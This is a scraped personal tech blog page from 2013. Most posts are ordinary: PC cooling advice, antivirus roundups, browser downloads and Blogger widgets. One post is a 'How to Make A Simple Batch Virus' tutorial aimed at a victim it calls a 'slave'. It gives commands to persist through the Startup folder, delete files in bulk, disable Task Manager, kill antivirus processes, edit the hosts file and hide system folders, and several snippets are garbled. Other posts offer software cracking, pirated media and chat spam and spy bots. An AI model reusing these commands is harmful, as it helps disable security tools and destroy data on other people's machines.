Wednesday, 13 November 2013

Reducing Heat Inside the PC to Prevent Overheating

This document pertains to HP Notebook PCs.
Heat buildup can cause problems for any computer. Generally, when temperatures inside the case rise above 35 degrees Celsius (95 degrees Fahrenheit), the risk of damaging important internal components increases greatly. The most common cause of overheating is the accumulation of dust inside the computer. The electrical components in a computer generate heat and fans inside the computer help move the air to keep the components cooled to normal operating temperatures. Inadequate cooling can cause excess heat to build up inside the case which can damage components.The sound of the fan running all the time may indicate that the computer is not running as efficiently as possible and that there is a problem with accumulated dust clogging the air vents.

View a video on Reducing Heat Inside the PC

Symptoms of heat issues and causes of excessive heat

The following list describes some of the issues caused by too much heat in the computer:
  • Games stop responding during play.
  • Windows stops responding during use.
  • Fans inside the computer become louder because they are spinning faster to remove the heat.
  • When starting the computer, it sometimes stops at a black screen and does not open into Windows. Windows usually stops responding when it does open.
  • Mouse and keyboard stop responding.
  • Windows 8, 7, Vista, XP - Computer unexpectedly restarts or displays a fault message.
    Windows 95, 98, and Me - Frequent Fatal Exception, Illegal Operation, or General Protection Fault error messages occur in several software programs.
    NOTE:These errors are not predictable. If these errors occur only in one software program, the issue

Best Free Antivirus-2013

Our best free antivirus round-up has been fully updated for August 2013.
Viruses, spyware, hackers, phishing sites - the web is a dangerous place, and every PC owner needs effective, reliable antivirus software to keep them safe. But this can be expensive, especially as you'll pay again to update the package, each and every year.
Fortunately there is plenty of free antivirus software, many of which are just as capable as their commercial cousins. So if you're tired of annual subscriptions, read on - we've picked out nine of the best free internet security tools to deliver great security at no cost at all.

1. Avast Free Antivirus

Download Avast Free Antivirus
You don't have to spend long with Avast Free Antivirus to realise why it's one of the most popular security tools around.
The program is simple to install; a straightforward interface makes it easy to use; a quick first scan should identify any potential threats on your PC, and this all has minimal impact on your system performance.
These aren't just subjective opinions, either. Independent testing by AV-Test has found the program to be a good all-rounder, and it was one of AV-Comparative's "Products of 2012".
Avast Free has some useful extras, too. A Software Updater alerts you to program updates you've missed, for instance, while its Browser Cleanup tool provides a simple way to remove unwanted add-ons from your browsers.

Thursday, 7 November 2013

Register comdlg32.ocx on x64 Win7

Today when I run an old tool on my x64 Windows 7, following error message is displayed:
Component ‘COMDLG32.OCX’ or one of its dependencies is not correctly registered: a file is missing or invalid.
comdlg32.ocx missing error
Here is how to resolve comdlg32.ocx missing error.
  1. Download and extract comdlg32.ocx from zip file

Wednesday, 16 October 2013

Download FireFox 25.0 Beta

The Web is all about innovation, and Firefox sets the pace with dozens of new features to deliver a faster, more secure and customizable Web browsing experience for all.
User Experience. The enhancements to Firefox provide the best possible browsing experience on the Web. The new Firefox smart location bar, affectionately known as the "Awesome Bar," learns as people use it, adapting to user preferences and offering better fitting matches over time.
Performance. Firefox is built on top of the powerful new Gecko platform, resulting in a safer, easier to use and more personal product.
Security. Firefox raises the bar for security. The new malware and phishing protection helps protect from viruses, worms, trojans and spyware to keep people safe on the Web.
Customization. Everyone uses the Web differently, and Firefox lets users customize their browser with more than 5,000 add-ons.

Download It From Here : Download Firefox 25.0 beta

Thanks For being with Us plz Like us On Fb==> computer Stuffs <==

Saturday, 5 October 2013

How to crack a software using CRACKDLL 3.1 ?


Hi Friends, its been almost about quarter year has been passed out and i am not posting anything on my hub. Today i am sharing how to crack a trail version software and make it into full version. But before you go through the tutorial one thing i want to make it clear that i dsn"t tested this software till. So go through this tutorial and make sure it is working well.

Steps :

Close the software you want to crack.   Download It From Here : CrackedDLL 3.1

Monday, 16 September 2013

Some of the Batch Viruses codes..

Photo: Some of the Batch Viruses codes..
<<::How To Make A Simple Batch Virus::>>

Some KeyWords:
%SystemRoot%/%WinDir% = Windows Directory
%SystemRoot%/%UserProfile% = Users -OR- Documents and Settings
%SystemRoot%/%ProgramFiles% = ProgramFiles Directory /**NOT PROGRAM FILES (X86) DIRECTORY **\
%SystemRoot%/%UserProfile%/%AppData% = AppData -OR- ApplicationData

What Will This Tutorial Contain:
A. How To Copy Random Useless Files To slave's Computer to Fill his/her HD
B. How To Block Websites
C. How To Open Sites
D. How To Delete Files With a Specific Extension
E. How To Copy Your Virus Into Registry/Startup
F. How To Change User's Password and Date
G. How To Make it a Loop
H. How To Kill Antivirus/Task Manager
I. How To Hide Important Files
J. How To Change/Switch Mouse Buttons

A. How To Copy Random Useless Files To slave's Computer to Fill his/her HD
You can add this to your Code which copies this file into many locations you choose:
Always Put Quotes and Replace EXT with any Extension You Like
copy %0 "%SystemRoot%\%random%.%random%"

B. How To Block Websites
Blocking websites does not allow the User to enter or connect to their Server, and this checks Hosts File in your C:/WINDOWS/System32/Drivers/ETC/ Folder.
So, if we put a code like:
cmd /c echo>>%SystemRoot%\%WinDir%\system32\Drivers\Etc\Hosts

It will block

C. How To Open Sites
Opening sites from a BatWch Shell is very easy.

Replace SITE with any site you like

D. How To Delete Files With a Specific Extension
This code is what I call "Search'n'Destroy". It Searches slave's computer for a specific extension and deletes every file it finds with that extension.
del *.*
) ELSE (
echo Error

Replace EXT with any Extension

E. How To Copy Your Virus Into Registry/Startup
Copying your Virus to StartUp will make slave's Computer Useless, depending on what Virus you made.
xcopy *.EXT "%userprofile%\Start Menu\Programs\Startup"

Replace EXT with these Extensions { EXE , BAT , CMD }, other extensions won't work.

F. How To Change User's Password and Date
Changing User's Password makes it more difficult for the slave to do anything in their computer. Changing Date can cause MSN Errors.
set date=1
reg.exe add "%date%" /f >nul

G. How To Make it a Loop
Making a Loop will cause your Virus to Continue Working Again and Again from the Start-To-End using Labels.
Put this on top of your batch after @ECHO OFF:

And this to the End of the Code:
GOTO :start

You can change the word START with anything. /**DO NOT FORGET THE : SIGN**\

H. How To Kill Antivirus/Task Manager
Killing TaskManager and AntiVirus makes the Computer 90-98% USELESS.
/F Forces the termination of all processes
/IM imagename Specifies the image name of the process that has to be terminated. Wildcard '*' can be used to specify all image names. Not used if PID is given in the command
taskkill /F /IM Taskmgr.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul

Replace Taskmgr.exe with any Program's Name, Do this for AntiVirus Programs ,too.
For Multiple Programs Use:
taskkill /F /IM egui.exe /IM avg.exe

This will stop EsetNOD32 and AVG AntiViruses

I. How To Hide Important Files
Hiding Important Files such us Windows Folder, Program Files Folders etc. It will work for someone who does not know how to use the Computer very well.
attrib +h FOLDER OR FILE

Replace FOLDER OR FILE with anything that exists

J. How To Change/Switch Mouse Buttons
Changing Mouse Buttons will COMPLETELY Comnfude the slave
Rundll32 user32,SwapMouseButton

Some of the Batch Viruses codes..
<<::How To Make A Simple Batch Virus::>>

Some KeyWords:
%SystemRoot%/%WinDir% = Windows Directory
%SystemRoot%/%UserProfile% = Users -OR- Documents and Settings
%SystemRoot%/%ProgramFiles% = ProgramFiles Directory /**NOT PROGRAM FILES (X86) DIRECTORY **\
%SystemRoot%/%UserProfile%/%AppData% = AppData -OR- ApplicationData

Sunday, 18 August 2013

Counter Strick Some Important cheats

We Are...." W@rL()d$".... 

Press ~ to enter the console on the server machine and type sv_cheats 1 or sv_ 1. Then, change maps by typing changelevel dust (or any other map). Finally, enter one of the following codes at the console to activate the corresponding cheat function. Note: Some codes have been changed or removed with various patch updates for the game.

Tricks                                                                         Cheats
1= enables pausing(not reccomended)pausable
1= single player enemies visiblemp_allowmonsters
1=cheats onsv_cheats
1=flashlight onmp_flashlight
1=no clippingsv_clipmode
1=turn on auto kick in gamemp_autokick

Monday, 15 July 2013

How to Creat a CSS based Button?

Hi Friends,

This code will help You in making a click Box using CSS commands.

Just try it..

Maniac's Unlimited Room Advertiser

Maniac's Unlimited Room Advertiser !!
( updated )
Creator : blind_maniac

Features ::
# Advertise to Room Users in Pvt
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# Auto Rooms User Check ( One After One )

Top Features Of Windows 8

Windows 8 is the most advanced operating system released by Microsoft. Due to its features windows 8 has been in the discussion since day it was released, some persons like them a lot and some totally dislikes it. Since it was totally different from its predecessors so some users find it difficult that’s why they totally dislike windows 8.

Dark Mig Messenger [DMM] free [UPDATE]

1. new look
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16.Easy game play batton
17.Auto reply pvt
18.Editable gateway
19.Suport unicode
20.Suport any language(arabic,bangla,hindi etc)
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23.Red/pink/orange id suport search/creat/settings
25.Easy bump and block user in room
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29.Social network
30.Extra emote
Download it From Here: Dark_Mig_Messenger_by_fajiil-

MiniBlog Poster V2

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 Download It From Here: MiniBlog Poster v2

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Download It From here: Maniac's Mig33 Fun Zone

Why I Stop Posting New Stuffs ?!

Hi friends,

Befor I say sorry for my absence for a long period of time you all must know about my circumstances what i m facing in my real life. Do you al ever imagine a Website owner without a system ?? :D

Its quit annoying and looks stupid when I say my laptop has been damaged and its about 3 months I am hanging out wihout a system. It just like a writer without a pen. LoL..

Hope you all understood my condition and know a proper reson why you all not geting hot n spicy new Stuffs.

From now when Ever I got Time I will post someting new for you all..

Until then Tack_care..

Keep Blogging. !!

Monday, 1 July 2013

Login Form- Simple Java Coding


As now I am going to share someting new about java coding.

It will help You to  to start your carrer in java langauge.

It is the most versatile language in the world and mostly used in all the the field. So do You wan lern JAVA its really  interesting  and very useful for all of the young generalizations who want a bi devrsified knowledge in all the fields.

Today I am going to share a code which will make you a Login button using j2sdk.

Sunday, 23 June 2013

Make Room Polpular [MRP] by mjridoy5

ScreenShot 27
A Simple Tool That Can Private all IDs of Any Room and Send Your Set Text !! Just a Pvt Room Advertiser !!

Download It From here: Make Room popular [MRP] 

All In One Advertiser v1.2



(*) Single Spy
(*) 3 In One Advertise [pvt / Group Invite / Wc in Room **Popular for Game Room**]
(*) Editable IP / Port
(*) Many Room pvt Ad at a Time

Thursday, 20 June 2013

Vlc media Player Latest version 2.07

hi Friends, Today I m going to share one of the mou=st popular media player in the whole world.  yes I m talking about Vlc Media Playe.

Although It is the best media player abut still it having many complains regarding its some of the exciting features.

It id the one of the best portable mediaplayer and can be used to play various audio and video formate.

It is just like the UNIVARSAL PlAYER for all of   Us.

Tuesday, 18 June 2013

Team Viewer 8.0 - Download It Now

Today Its Time to focus on our Internet Speed.

Today s stuff is all fav. Team Viewer.
All day we use to think about how to share our desktop files to someone who is far setting physical apart from you. Sometime new online Lerner also caught many problem in solving any  programing issue and all other stuffs because they are unable to get their problem backbone to any  professional in that field.

But by using this awesome software you can short out all your problems in just accepting few simple steps and going out with some short of clicks.

Saturday, 15 June 2013

Electrofire v2.1

[Image: Capture13-19-2013-2.22.13-AM.jpg]

[Image: Capture13-19-2013-2.23.44-AM.jpg]

Features :-
1. Follow
2. Avatar vote
3. Like
4. Avatar Comment
   i) Same Comment
   ii) Rando

Friday, 14 June 2013

Make Money Online

Hello friends, We alwys think about making some short of money from my own business, So here we are I m giving U two ways from which you can make money easily.

Just keep one thing in mind ..


Just go to the two diffrent link register their and start making mOney its realy very easy and simple.

After the registration you will got all the simple detail about it and all the instruction are given in very simple mannure.

Here are two Links...

1. In this website you will get paid if any user click on your link .

Get paid to share your links!

2. Chitika is online ad publisher website you will get paid if ur website viewers use to click on the advertise.

Apply to be a Chitika Publisher!

Thanks For being with Us plz Like us On Fb==> computer Stuffs <==

Monday, 3 June 2013

Univarsal Extractor

hi Friends, Today's Stuff is here..

The Universal Extractor

Universal Extractor is a program do to exactly what it says: extract files from any type of archive, whether it's a simple zip file, an installation program (like Wise or NSIS), or even a Windows Installer (.msi) package.

This application is not intended to be a general purpose archiving program. It will never replace WinRAR, 7-Zip, etc. What it will do is allow you to extract files from virtually any type of archive, regardless of source, compression method, etc.

Mozilla FireFox 22.0 Veersion relased

Hi Friends, Mozila Newest Version has been released out. Go n download it from Here..


Browsing Made Easy

Awesome Bar

Awesome Bar screenshot Get to your favorite sites quickly – even if you don’t remember the URLs. Type your term into the location bar (aka the Awesome Bar) and the autocomplete function will include possible matches from your browsing history, bookmarked sites and open tabs.
The Awesome Bar learns as you use it—over time, it adapts to your preferences and offers better-fitting matches. We’ve tweaked it to give you greater control over the results (including privacy settings) and increased performance so you find what you need even faster.

Creativity - Facebook stuffs

Funny but amazing Creativity...

..........╭╬╮ ◢
...........╙O ╙O

Copy Paste n EnJoy It.

Devastation By Playboy_-_Farhan

Devastation By .:: Playboy_-_Farhan :: Mahomed Farhan ::. [[ALIENWARES CORP :: T3RMIN4T0RZ CORP]]™
..:: Features ::..
- Login 1 Id
- Room , Pvt, Group Chat.
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- Get All In HTML
- Balance Check
- And Lots Of Features 
Download At : 
By Playboy_-_Farhan
  • Login 1 Id 
  • Room , Pvt, Group Chat.Search User Profile
  • Get All In HTML

Popular posts With Automatci Numbering

 Popular Posts Widget
hey mates,

how are you?

Its been a long time we never meet with each other. But still i thought U will remember me.

Today i m going To Just share a very exciting Blogers Windget, which will be very beautifull n attractive for your blog.

I got this artivle on one and only --->> My Bloggers Trick <<---

Here We Go ...

  1. Go to Blogger > Layout
  2. Click "Add a Gadget"
  3. Choose "Popular Posts"  from the list
  4. You will need to configure its settings as shown in the image below: uncheck "image thumbnail" and also "snippet"   Its better that you display at most 7-9 posts. Less is good and clean. 

Sunday, 26 May 2013

Top 5 Programer In the World

 Here is a list of world's best programmers around the world who changed computer era by developing computer software, programs and also operating system.

#1.  Dennis Ritchie

Dennis Ritchie (1941-2011) was an American Computer Programmer. Sir. Ritchie developed "C" programming language and co-developer of Unix Operating system. Dennis Ritchie worked for Alcatel-Lucent and for Bell labs.

Dennis Ritchie changed digital era by creating "C" programming language. Lisp, Visual Basic, Pascal, COBOL, Turbo pascal 7.0, PL/1, ADA, these are the programming languages are written in C programming language.  "C" is a best programming language for newbie programmers, Who are interested in learning codes.

Wednesday, 22 May 2013

Flip your Google Down- Funny trick

Hey firends, its been so long i cant see any own posts as u all know the reasons that i am busy with my exams n all that stuffs. But last night I realy got someting intresting which make a cute smile to your face...

Just a samll but funny trick I would Like to share with you all about Google

Monday, 20 May 2013

Funny Miss UndrsTanding..

A young woman who was several months pregnant was sitting in a bus.

When she noticed a young man smiling at her she began feeling humiliated on account of her condition.

She changed her seat and he seemed more amused.

She moved again and then on seeing him laughing more. She filed a court case on him.

In the court the man's deference was:-

Vampire Diaries-s-4- Episode 23 Download


The Vampire Diaries Season 4 Episode 23 Full Free Download HD 2013 Online Info.
Paul Wesley,Nina Dobrev,Steven R. McQueen,Ian Somerhalder,Kat Graham,Candice Accola,Joseph Morgan,Nathaniel Buzolic,Claire Holt…
Episode Name:
Chris Grismer

Thursday, 16 May 2013

Iron Man 3 - Realesed

Iron Man 3 2013 R6 720p x264 AC3

IMDb Information:

Sample Included: Yes
Format: AVI
Format/Info: Audio Video Interleave
File size: 1.45 GiB
Duration: 2h 13mn
Overall bit rate: 1 553 Kbps
Genre: Action | Adventure | Sci-Fi

Codec ID: H264
Bit rate: 1 349 Kbps
Width: 1280 pixels
Height: 720 pixels
Display aspect ratio : 16:9
Frame rate: 29.970 fps


Tuesday, 14 May 2013

Smith Chart -Matlab Progaming Code

Hi Engineers, I don't want to tell lie about my this post so i thought that without going all around the world i am coming straight to the point. Yesterday I have my EM theory exam and my exam fear has been increased by this programing of which contains bunch of typical codings which is not almost impossible to rember in just a night study, which is very much comman for all enginnering students.

So after messing up with my brain i came out with a woundrfull idea !!

Why don't i copy paste my coding in here and get it if i get my luck stuck with smith chart.

Monday, 13 May 2013


[Image: rv2.png]
Features :-

  • Fast / Unlimited Login
  • Bullet Speed Captcha Fix
  • Bullet Like / Auto Pause On Limit Error
  • Unlimited vote

Sunday, 12 May 2013

HR Interview Questions and Answers [Must Read]

Tell me about yourself.

Good morning sir/madam,

I am Divya from perambur.

I finished my schooling in Bosco Academy with a percentage of 84 in 10th and 85 in 12th.

I completed my engineering in vel tech engineering college with a percentage of 78.

My family consist of 4 members,

My father is a traffic police.

Saturday, 11 May 2013

[SSRS] Super Silent Room Spy By mjridoy5

Features :-

  • 1. Spy Login Fast
  • 2. Copy all text Of SpyRoom
  • 3. Paste in Another Room
  • 4. Easy To Handle With Mobile Command In ROom
  • 5. One Commander To COntrol Spy

AVG Free Edition 2013

Hi Gys, We all worry about the different viruses that effect our daily routine and make our system malfunction, and most of the time the main threat is caused by harmful viruses and spywares which are designed in such a way that it make ur system slow or steal our precious data.

Your first question is ..

What to do ?

MIG DEVIL [Admin Tool] by sulti-

 Features :-

  •  * Room Spy
  • * ID Set Status
  • * Auto Room List
  • * Auto Kick / Ban All List

Tuesday, 7 May 2013

Something Really Dangerous[SRD] By mjriody5

 Features :-

1. Unlimited ID load
2. Unlimited ID Login
3. 10 Set ID
4. Unlimited ID per set
5. Fast Login
6. Loaded ID Count
7. 320 Flood Text

Monday, 6 May 2013

Hancy Style Of Voting Avatar By Hancy

Features :-
  •   1000 id Login
  •   Unlimited Avatar vote

gambling desert by solo.mero

Features :-

Which will help you to play lowcard and dice easly with full options control to you.

  • 1- draw and roll after seconds which u specific
  • 2- auto start game with your customizable amount (amount in cent)
  • 3- opening soft counter

Sunday, 5 May 2013

Cheatbook-DataBase 2013 Free Download

Hi Gamers, a long time not posting any thing special for all my gaming friends, so I think that I should 
start it with some gaming tricks because we usulay looking for latest and amazing tricks while we use to play games.

 So Gys You all Know about Cheat Book Databases. This is very old and reliable software which is free available on web. This is one of my favorite softy to get out tricks and tips while I use To play games.

Page Navigation Widget For Blogger Hosted Blogs

Hi Gys, TOday while i m surfing on net I got something realy usefull posts which will help you to add a Page Navigator Windget for your blog.

So I am going to teach you how to do it.

Just follow these steps..

Desert Of Gifts by solo.mero

Desert Of Gifts

Features :-
  • incoming data show
  • auto change gifts

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